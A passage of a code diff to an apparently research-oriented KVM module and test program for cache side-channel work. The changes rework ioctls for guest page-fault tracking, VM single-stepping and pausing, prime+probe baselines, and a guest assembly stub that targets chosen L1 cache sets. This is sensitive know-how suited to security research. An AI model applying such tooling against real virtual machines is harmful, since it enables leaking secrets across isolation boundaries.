KVM_CPC_TRACK_MODE: - return cachepc_kvm_track_mode_ioctl(arg_user); - // case KVM_CPC_TRACK_PAGE: - // return cachepc_kvm_track_page_ioctl(arg_user); - // case KVM_CPC_TRACK_ALL: - // return cachepc_kvm_track_all_ioctl(arg_user); - // case KVM_CPC_UNTRACK_ALL: - // return cachepc_kvm_untrack_all_ioctl(arg_user); case KVM_CPC_RESET_TRACKING: return cachepc_kvm_reset_tracking_ioctl(arg_user); + case KVM_CPC_TRACK_MODE: + return cachepc_kvm_track_mode_ioctl(arg_user); case KVM_CPC_POLL_EVENT: return cachepc_kvm_poll_event_ioctl(arg_user); case KVM_CPC_ACK_EVENT: return cachepc_kvm_ack_event_ioctl(arg_user); + // case KVM_CPC_TRACK_PAGE: + // return cachepc_kvm_track_page_ioctl(arg_user); // case KVM_CPC_TRACK_RANGE_START: // return cachepc_kvm_track_range_start_ioctl(arg_user); // case KVM_CPC_TRACK_RANGE_END: // return cachepc_kvm_track_range_end_ioctl(arg_user); // case KVM_CPC_TRACK_EXEC_CUR: // return cachepc_kvm_track_exec_cur_ioctl(arg_user); - case KVM_CPC_VM_PAUSE: - return cachepc_kvm_vm_pause_ioctl(arg_user); - case KVM_CPC_VM_RESUME: - return cachepc_kvm_vm_resume_ioctl(arg_user); + case KVM_CPC_VM_REQ_PAUSE: + return cachepc_kvm_req_pause_ioctl(arg_user); default: return kvm_arch_dev_ioctl(file, ioctl, arg); } @@ -827,9 +717,9 @@ cachepc_kvm_setup_test(void *p) cachepc_kvm_system_setup(); - cachepc_kvm_prime_probe_test(NULL); + cachepc_kvm_prime_probe_test(); + cachepc_kvm_stream_hwpf_test(); cachepc_kvm_single_eviction_test(NULL); - cachepc_kvm_stream_hwpf_test(NULL); exit: put_cpu(); @@ -843,10 +733,11 @@ cachepc_kvm_init(void) cachepc_ctx = NULL; cachepc_ds = NULL; - cachepc_retinst = 0; cachepc_debug = false; - cachepc_single_step = false; + cachepc_retinst = 0; + cachepc_singlestep = false; + cachepc_singlestep_reset = false; cachepc_track_mode = CPC_TRACK_NONE; cachepc_inst_fault_gfn = 0; diff --git a/cachepc/uapi.h b/cachepc/uapi.h @@ -33,8 +33,7 @@ #define KVM_CPC_POLL_EVENT _IOWR(KVMIO, 0x48, struct cpc_event) #define KVM_CPC_ACK_EVENT _IOWR(KVMIO, 0x49, __u64) -#define KVM_CPC_VM_PAUSE _IO(KVMIO, 0x50) -#define KVM_CPC_VM_RESUME _IO(KVMIO, 0x51) +#define KVM_CPC_VM_REQ_PAUSE _IO(KVMIO, 0x50) enum { CPC_EVENT_NONE, @@ -51,6 +50,7 @@ enum { enum { CPC_TRACK_NONE, + CPC_TRACK_FAULT_NO_RUN, CPC_TRACK_EXEC, CPC_TRACK_FULL, }; diff --git a/test/kvm-step.c b/test/kvm-step.c @@ -112,15 +112,20 @@ main(int argc, const char **argv) printf("VM start\n"); - ret = ioctl(kvm.vcpufd, KVM_RUN, NULL); - if (ret < 0) err(1, "KVM_RUN"); + do { + ret = ioctl(kvm.vcpufd, KVM_RUN, NULL); + if (ret < 0) err(1, "KVM_RUN"); + + if (kvm.run->exit_reason == KVM_EXIT_HLT) + printf("VM halt\n"); + } while (kvm.run->exit_reason == KVM_EXIT_HLT); printf("VM exit\n"); } else { pin_process(0, SECONDARY_CORE, true); - /* single step and log all accessed pages */ - arg = CPC_TRACK_FULL; + /* capture baseline by just letting it fault over and over */ + arg = CPC_TRACK_FAULT_NO_RUN; ret = ioctl(kvm_dev, KVM_CPC_TRACK_MODE, &arg); if (ret) err(1, "ioctl KVM_CPC_TRACK_MODE"); @@ -133,12 +138,24 @@ main(int argc, const char **argv) /* run vm while baseline is calculated */ eventcnt = 0; - while (eventcnt < 30) { + while (eventcnt < 50) { eventcnt += monitor(&kvm, true); } - ret = ioctl(kvm_dev, KVM_CPC_VM_PAUSE, &event); - if (ret) err(1, "ioctl KVM_CPC_VM_PAUSE"); + ret = ioctl(kvm_dev, KVM_CPC_VM_REQ_PAUSE); + if (ret) err(1, "ioctl KVM_CPC_VM_REQ_PAUSE"); + + while (1) { + ret = ioctl(kvm_dev, KVM_CPC_POLL_EVENT, &event); + if (ret && errno == EAGAIN) continue; + if (ret) err(1, "ioctl KVM_CPC_POLL_EVENT"); + + if (event.type == CPC_EVENT_PAUSE) break; + + printf("Skipping non-pause event..\n"); + ret = ioctl(kvm_dev, KVM_CPC_ACK_EVENT, &event.id); + if (ret) err(1, "ioctl KVM_CPC_ACK_EVENT"); + } arg = false; ret = ioctl(kvm_dev, KVM_CPC_CALC_BASELINE, &arg); @@ -151,17 +168,22 @@ main(int argc, const char **argv) print_counts(baseline); printf("\n"); print_counts_raw(baseline); - printf("\n"); + printf("\n\n"); arg = true; ret = ioctl(kvm_dev, KVM_CPC_APPLY_BASELINE, &arg); if (ret) err(1, "ioctl KMV_CPC_APPLY_BASELINE"); - ret = ioctl(kvm_dev, KVM_CPC_VM_RESUME, &event.id); - if (ret) err(1, "ioctl KVM_CPC_VM_RESUME"); + /* single step and log all accessed pages */ + arg = CPC_TRACK_FULL; + ret = ioctl(kvm_dev, KVM_CPC_TRACK_MODE, &arg); + if (ret) err(1, "ioctl KVM_CPC_TRACK_MODE"); + + ret = ioctl(kvm_dev, KVM_CPC_ACK_EVENT, &event.id); + if (ret) err(1, "ioctl KVM_CPC_ACK_EVENT"); eventcnt = 0; - while (eventcnt < 30) { + while (eventcnt < 50) { eventcnt += monitor(&kvm, false); } diff --git a/test/kvm-step_guest.S b/test/kvm-step_guest.S @@ -6,13 +6,17 @@ .global guest_stop guest_start: - mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx - mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx - mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx - mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx - mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx - mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx - mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx + mov $(L1_LINESIZE * (L1_SETS + 9)), %rbx +# hlt +# mov $(L1_LINESIZE * (L1_SETS + 10)), %rbx + mov $(L1_LINESIZE * (L1_SETS + 11)), %rbx +# hlt +# mov $(L1_LINESIZE * (L1_SETS + 12)), %rbx + mov $(L1_LINESIZE * (L1_SETS + 13)), %rbx +# hlt +# mov $(L1_LINESIZE * (L1_SETS + 14)), %rbx + mov $(L1_LINESIZE * (L1_SETS + 15)), %rbx + hlt jmp guest_start guest_stop: